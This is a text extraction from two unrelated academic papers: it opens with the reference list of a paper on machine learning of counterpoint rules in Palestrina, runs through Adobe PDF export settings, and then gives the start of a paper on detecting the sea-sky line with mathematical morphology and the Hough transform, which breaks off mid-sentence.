Constraint programming systems for modeling music theories and composition. ACM Computing Surveys 43(4):1–38 DOI 10.1145/1978802.1978809. Anglade A, Dixon S. 2008. Characterisation of harmony with inductive logic programming. In: ISMIR. Philadelphia, 63–68. Ariza C, Cuthbert MS. 2010. Modeling beats, accents, beams, and time signatures hierarchically with music21 meter objects. In: Proceedings of the International Computer Music Conference, ICMC2010, New York, USA. Ann Arbor: Michigan Publishing, 216–223. Baker D. 1988. David Baker’s Jazz improvisation. Revised Edition. Van Nuys: Alfred Publishing. Cuthbert MS, Ariza C. 2010. music21: a toolkit for computer-aided musicology and symbolic music data. In: Proceedings of the 11th International Society for Music Information Retrieval Conference, ISMIR 2010. Utrecht: International Society for Music Information Retrieval, Seaver Institute, 637–642. Da Palestrina GP. 1939. Le opere complete. Per cura e studio di Raffaele Casimiri. Vol. 34. Rome: Fratelli Scalera. Ebcioglu K. 1980. Computer counterpoint. In: Proceedings of the International Computer Music Conference 1980. San Francisco: International Computer Music Association, 534–543. Ester M, Kriegel H-P, Sander J, Xu X. 1996. Density-based algorithm for discovering clusters in large spatial databases with noise. In: Proceedings of the Second International Conference on Knowledge Discovery and Data Mining (KDD-96). Munich: AAAI Press, 226–231. Fernández JD, Vico F. 2013. AI methods in algorithmic composition: a comprehensive survey. Journal of Artificial Intelligence Research 48:513–582 DOI 10.1613/jair.3908. Fortin F-A, De Rainville F-M, Gardner M-AG, Parizeau M, Gagné C. 2012. DEAP: evolutionary algorithms made easy. Journal of Machine Learning Research 13(1):2171–2175. Fux JJ. 1965. The study of counterpoint. from Johann Joseph Fux’s Gradus ad Parnassum. London: W.W. Norton & Company. Orig. 1725, translated and edited by Alfred Mann. Hiller L, Isaacson L. 1993. Musical composition with a high-speed digital computer. In: Schwanauer SM, Lewitt DA, eds. Machine Models of Music. Cambridge: MIT press, 9–21 Reprint of original articel in Journal of Audio Engineering Society, 1958. Jeppesen K. 1939. Counterpoint: the polyphonic vocal style of the sixteenth century. New York: Prentice-Hall. Trans. by G. Haydon, Dover reprint 1992. Jeppesen K. 1946. The style of Palestrina and the dissonance. Second Edition. New York: Oxford University Press. Trans. by E. J. Dent, Dover reprint 1970. Johanson B, Poli R. 1998. GP-music: an interactive genetic programming system for music generation with automated fitness raters. Technical Report CSRP-98-13, University of Birmingham. Kattan A, Agapitos A, Poli R. 2010. Unsupervised problem decomposition using genetic programming. In: Esparcia-Alcazar AI, Ekart A, Silva S, Dignum S, Uyar AS, eds. European Conference on Genetic Programming, Istanbul, Turkey. Berlin: Springer-Verlag, 122–133. Kattan A, Fatima S, Arif M. 2015. Time-series event-based prediction: an unsupervised learning framework based on genetic programming. Information Sciences 301:99–123 DOI 10.1016/j.ins.2014.12.054. Koza JR. 1992. Genetic programming: on the programming of computers by means of natural selection. Cambridge: MIT Press. Krumhansl CL. 1990. Cognitive foundations of musical pitch. New York: Oxford University Press. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 18/19 http://dx.doi.org/10.1145/1978802.1978809 http://dx.doi.org/10.1613/jair.3908 http://dx.doi.org/10.1016/j.ins.2014.12.054 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ Laurson M, Kuuskankare M, Norilo V. 2009. An overview of PWGL, a visual programming environment for music. Computer Music Journal 33(1):19–31 DOI 10.1162/comj.2009.33.1.19. Morales E, Morales R. 1995. Learning musical rules. In: Widmer G, ed. Proceedings of the IJCAI-95 International Workshop on Artificial Intelligence and Music, 14th International Joint Conference on Artificial Intelligence (IJCAI-95), Menlo Park, CA, USA. Montreal: American Association for Artificial Intelligence, 81–85. Muggleton S, De Raedt L, Poole D, Bratko I, Flach P, Inoue K, Srinivasan A. 2012. ILP turns 20. Machine Learning 86(1):3–23 DOI 10.1007/s10994-011-5259-2. Patrick PH, Strickler K. 1978. A computer-assisted study of dissonance in the masses of Josquin Desprez. Computers and the Humanities 12(4):341–364 DOI 10.1007/BF02400106. Pedregosa F, Varoquaux G, Gramfort A, Michel V, Thirion B, Grisel O, Blondel M, Prettenhofer P, Weiss R, Dubourg V, Vanderplas J, Passos A, Cournapeau D, Brucher M, Perrot M, Duchesnay E. 2011. Scikit-learn: machine learning in Python. Journal of Machine Learning Research 12:2825–2830. Poli R, Langdon WB, McPhee NF. 2008. A field guide to genetic programming. Morrisville, NC: Lulu.com. Ramirez R, Perez A, Kersten S, Rizo D, Roman P, Inesta JM. 2010. Modeling violin performances using inductive logic programming. Intelligent Data Analysis 14(5):573–585 DOI 10.3233/IDA-2010-0440. Sandred Ö. 2010. PWMC, a constraint-solving system for generating music scores. Computer Music Journal 34(2):8–24 DOI 10.1162/comj.2010.34.2.8. Sapp CS. 2011. Computational methods for the analysis of musical structure. PhD thesis, Stanford University. Schmidt M, Lipson H. 2009. Distilling free-form natural laws from experimental data. Science 324(5923):81–85 DOI 10.1126/science.1165893. Schottstaedt W. 1989. Automatic counterpoint. In: Mathews MV, Pierce JR, eds. Current Directions in Computer Music Research. Cambridge: The MIT Press, 199–214. Sigler A, Wild J, Handelman E. 2015. Schematizing the treatment of dissonance in 16th-century counterpoint. In: Proceedings of the 16th International Society for Music Information Retrieval Conference, ISMIR 2015. Málaga, 645–651. Spector L, Alpern A. 1994. Criticism, culture, and the automatic generation of artworks. In: Proceedings of the Twelfth National Conference on Artificial Intelligence, AAAI-94. Seattle, 3–8. Tobudic A, Widmer G. 2003. Relational IBL in music with a new structural similarity measure. In: Proceedings of the International Conference on Inductive Logic Programming. Szeged: Springer, 365–382. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 19/19 http://dx.doi.org/10.1162/comj.2009.33.1.19 http://dx.doi.org/10.1007/s10994-011-5259-2 http://dx.doi.org/10.1007/BF02400106 http://dx.doi.org/10.3233/IDA-2010-0440 http://dx.doi.org/10.1162/comj.2010.34.2.8 http://dx.doi.org/10.1126/science.1165893 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ Machine learning of symbolic compositional rules with genetic programming: dissonance treatment in Palestrina Introduction Background Methods Results Discussion Conclusions flink7 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_mpnezfgmz5g6diku4y7puutx2i ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-010 85 The New Method of Sea-sky Line Detection Based on Mathematical Morphology Zhang Wenqi School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail:362976306@qq.com Bai Wanmin School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 541592039@qq.com Yu Jun School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 763757335 @qq.com Gao Shouyi School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 478204287@qq.com Abstract—To solve the problem of low accuracy and robustness of sea-sky line detection, this paper presents a method of sea- sky line detection based on the mathematical morphology. Firstly, the mathematical morphology closed-open operation is used to filter and denoise the sea-sky image. Then the Canny operator is used to obtain the sea-sky boundary of the image, Then mathematical morphological operation is used to remove some disturbing points. Finally, the sea-sky line is detected by Hough transform. The experimental results show that the algorithm can accurately and efficiently detect the sea-sky line under the complex sea-sky background. Keywords-Sea-sky Line; Mathematical Morphology; Edge Detection; Hough Transformation I. INTRODUCTION The sea-sky line is the dividing line between the sea and the sky. In general, an image of sea-sky background mainly includes three regions, those are brighter sky area, the darker sea area, and the sea-sky line area from light to dark [1]. If the low altitude investigation is carried out, the target on the sea usually appears in the area of sea-sky line. By detecting and obtaining the sea-sky line, it can reduce the calculation amount of target detection and shorten the calculation time. At the same time, it can distinguish between the sky area and sea area, that is meaningful to the simulation experiment of target detection on the sea. The sea-sky line detection is influenced from marine environment greatly. The main influencing factors are as follows : (1) The strong watermark interference caused by the wave, that makes the gray-value of the wave which is close to the pixel point gray-value of the sea-sky line, so that the extraction of the sea-sky line is difficult. (2) When the background images contain mountains, ships and so on , which will interfere with the detection of sea-sky lines; (3) When the atmospheric visibility is low, the sea-sky boundary is blurred, which leads to difficult y on detecting sea-sky line. In order to detect the sea-sky line accurately, we need to know about its characteristics as follows. (1) The area of sea-sky line is between the sky and the sea. Its brightness is more intense than the other two parts. Grayscale changes strongly in vertical direction as well as varies in horizontal direction slowly. (2) The sea-sky line is usually not a straight line but a gradual change band. At present, there are many reference documentation on sea-sky line detection. For example, Liang D and others use the algorithm of OTSU segmentation and clustering in order to detect the sea-sky lines[2]. Because the OTSU segmentation algorithm could not accurately segment the sea-sky background images with imbalanced illumination. It makes the sea-sky line detection error in this kind of image; H. Wang and others use the algorithm of combining the Sobel operator with the straight line fitting to carry out the sea-sky line detection[3]. This method can be used to extract the sea-sky line in simple background, but it is difficult to get a satisfactory extraction effect in some complicated situations. Wang Bo and others use the algorithm of gradient saliency region growth to detect the sea-sky lines[4], but the sea surface splash and water wave will interfere with the image gradient calculation. For the complex images of sea conditions, these methods are limited in certain degree. In order to improve the robustness and accuracy of sea- sky line detection, the method of sea-sky line detection based on mathematical morphology is proposed. This method can improve the robustness of sea-sky line detection in the complex sea-sky background. The mathematical morphology are used to denoise sea-sky images and remove interference points, which can reduce computation and improve the accuracy of sea sky detection. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 86 II. MATHEMATICAL MORPHOLOGY The mathematical morphology is a nonlinear image processing and analysis theory. It is characterized by geometrical method, which is more suitable for the processing and analysis of visual information. The basic idea of the mathematical morphology is to measure the availability of the target image region and the effectiveness of the filling method by using a certain form of structural elements. Then it extracts more essential information of the related characteristics of the image morphology ,which can achieve the purpose of the target image analysis and recognition. The mathematical morphology can eliminate the unrelated morphological and structural attributes in the target image and retain the basic nature of the morphological and structural properties to simplify the target image data, so that it has the characteristics of fast parallel speed and easy implement in hardware. The algorithm has the natural parallel structure. It realizes the parallel of morphological analysis and process, which greatly improves the speed of image analysis and process. At present, the mathematical morphology has been widely used in the fields of pattern recognition, machine vision, microscopic image analysis, medical image processing, computing and data processing and so on. It has obvious advantages in image processing problems such as filtering noise reduction, image enhancement, edge detection, image segmentation, feature extraction, texture analysis, image restoration and reconstruction, and image compression and so on. A. The.Mathematical Morphology Operation The mathematical morphology is composed of a set of morphological algebraic operators , whose basic operations are shown as follows: expansion, erosion, opening and closing. These operations have different characteristics in binary and grayscale images [5] . These basic operations can also be derived and combined into various practical algorithms of the mathematical morphology, which can be used to analyze and process the shape and structure of the image. The most basic morphological transformation of the mathematical morphology includes expansion and corrosion, which can achieve many functions, such as filtering noise, dividing the independent elements and bridging the adjacent elements in the target image. The mathematical morphology can also be used to find the maximum or minimum region of the obvious block in the target image and get the gradient of the target image. The expansion operation is to calculate the local maximum. While the corrosion operation is to calculate the minimum value of the pixel in the area. The two operations are a pair of mutually dual operations [6].The expansion operation is a process to expand the edge to the outside. It can be used to fill the small holes in the target image and transform the background edge into the target edge, so that the goal is increased and the background is reduced. The corrosion operation is a process that removes the unrelated edge points and makes the edge shrink inward. It can eliminate the small bulges in the target image and reduce the target and increase the background. The other morphological operations are composed of two basic morphological transformations[6-7], such as opening and closing. The f(x, y ) is set as an input image, b(x, y)is set as a structural element. The structure element b is used to handle the input the image f(x, y ).As the formula(1) shown, this is an expansion operation. As the formula (2) shown, this is a corrosion operation . Definition 1 The image f is expanded by using the structural element b , writed as f b .  ( , ) [ ]( , ) max{ ( , )} st b f b x y f x s y t       Definition 2 The image f is Corroded by using the structural element b , writed as f b .  ( , ) [ ]( , ) min{ ( , )} st b f b x y f x s y t      Based on the two basic morphological transformations of expansion and corrosion, many mathematical morphological clusters can be constructed. While open and closed operations are the two basic operations in the cluster [7-8] . The open operation firstly corrodes the image and then expands it, as shown in the formula (3).The closed operation firstly expands the image and then corrodes it, as shown in the formula (4). Definition 3 The image f is opened by using the structural element b , writed as f b  ( )f b f b b    Definition 4 The image f is closed by using the structural element b, writed as f b  ( )f b f b b     As shown in Fig.1, the Fig.(a) is a square structural element, whose size is . The Fig.(b) is the objective matrix that we want to perform the mathematical morphology operations. The Fig.(c) is the result diagram of the corrosion operation. We use the structural elements that is shown in the Fig.(a) to handle the target matrix of the Fig.(b). The Fig.(d) is the result graph of the expansion operation that we use the structural elements that is shown in the Fig.(a) to handle the target matrix of the Fig.(b). International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 87 （a）Structural （b）Matrix （c）Corrosion operation （d）Expansion operation elements Figure 1. The mathematical morphology operation The open operation can remove isolated points, burrs and small bridges (that is, the small points connected to two blocks), which can be used to segment large areas and smooth the edges of large area. While the total position and shape are constant. The closed operation can fill the small holes in the object and achieve the purpose of stitching small cracks to connect the adjacent objects and smooth edges .While the total position and shape are constant. The open operation and closed operation are also a pair of dual operations. The closed operation can be filled with low grayscale black holes. And the open operation will inhibit the white point( noise) with high gray value. The operation that the closed operation is performed firstly ,followed that the open operation is used to make the de-noising effect better and smooth edge. Therefore, the closed - open operation are choosen in the this article to filter and reduce the noise of the sky-sea images. B. Selection of Structural Elements In any condition, the mathematical morphology algorithm is composed of two basic problems: mathematical morphology operation and structural element selection. The definition of mathematical morphology makes the operation rules of mathematical morphology constant. Therefore, the selection of morphological and structural elements determines the purpose and effect of mathematical morphology algorithm. Throughout, The determination and optimization of structural elements have become hot topics and difficulties in the study of the mathematical morphology. The choice of the morphological structure elements can be divided into two aspects: the size and the shape of the structural elements. Generally speaking, the structural elements must be geometrically simpler than the original image. And they are bounded; Besides, the convexity of structural elements is also important. Based on the selection principle of structural elements, we usually choose some small simple collections, such as square, diamond, circle and so on. As shown in the Fig. 2, there are some examples of structural elements.                 00000 00000 11111 00000 00000                 00100 01110 11111 01110 00100 （b）The linear （b）The rhombic structural elements structure element                 00000 00000 11111 11111 00000                 11111 11111 11111 11111 11111 (c)The rectangular （d）The square structural elements structural elements Figure 2. The structural elements If the structural elements are not properly selected, they can not effectively process pictures. And the result will not have the desired effect. That mainly include the following two conditions.(1) When the size of the selected structure element is too small, the open operation cannot effectively eliminate the larger high grayscale noise point; For larger, low-gray black holes, that cannot be effectively bridged by the closed calculations. (2) When the size of the selected structure element is too large, on the one hand, the open operations will excessively eliminate pixel points on the edges of the image and cause false breaks. On the other hand, the closed operations will over-combine black holes and generate interference information [9-10] . Therefore, the use of single size structure elements can easily lead to the edge location of the target image is not accurate enough and the denoising effect is not ideal. In International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 88 addition, due to the existence of a constraint relation on the edge of the image, the noise of the image is generated randomly. When the structural elements is used to measure the target image, a geometric shape similar edge point can always be found near the edge points of the image. Thus, it is not effective to retain the edge segmentation information of the image by using a single morphological structure element to extract the edge of the target image. Consequently, when the sea-sky line is extracted in the target image. If the single size and shape structure elements are used for image processing, the location is not accurate, the de-noising effect is not ideal, and the detail information of the sea-sky line can not be retained effectively. In conclusion, this paper adopts multi-dimensional, multiple- shape structure elements to process sea-sky images. III. SEA-SKY LINE DETECTION ALGORITHM DESIGN The sea-sky line detection algorithm in this paper is based on the mathematical morphology. The overall flow diagram is shown in the Fig.3 . Firstly, the sky-sea image is preprocessed. The mathematical morphology is used to filter the target sea-sky background image and denoise the interference of the sea-sky lines; Secondly, the Canny operator is used to extract the sea sky boundary of the preprocessed sea-sky background image. Follow that the mathematical morphology is used again to remove the interference points, so that the sea-sky line detection is more efficient and accurate. Finally, the Hough line detection and the least square method are used. Linear fitting is used to get the final sea-sky lines. Image Preprocessing Interference Point Removal Edge Extraction Hough Line Detection Algorithm in This Paper Usual Algorithm Line Fitting Figure 3. Overall flow chart Step 1: We preprocess the image to solve the interference problems caused by strong watermark and uneven illumination. In which, the structural elements of closed operation and open operation are square structural elements. Step 2:We use the Canny operator to extract the preprocessed sea- sky pictures. Step 3: The mathematical morphology is carried out to remove the interference points, so that the sea-sky line detection is more efficient and accurate. The structural elements is the linear structural elements. Step 4: We use Hough straight line detection and the least square fitting method to get the sea-sky lines. The followings focuse on mathematical morphology of image preprocessing, interference point elimination, as well as the Hough line detection and other major steps to describe. A. Image Preprocessing In the process of the initial image collection, due to optical system distortion, relative motion, weather and other reasons, the noise is inevitable. In the process of transmission, noise can pollute the image and noise points have a certain bad effect on edge detection [11]. Generally, the Gauss filter is used to remove noise. However, this paper uses the mathematical morphology filter to preprocess the image, which can make the brightness of the target image more uniform and remove the interference of the watermark. At the same time, that can preserve the structure gradient information of the image better. In this paper, a closed-open filter(COF) is constructed through the combination of opening 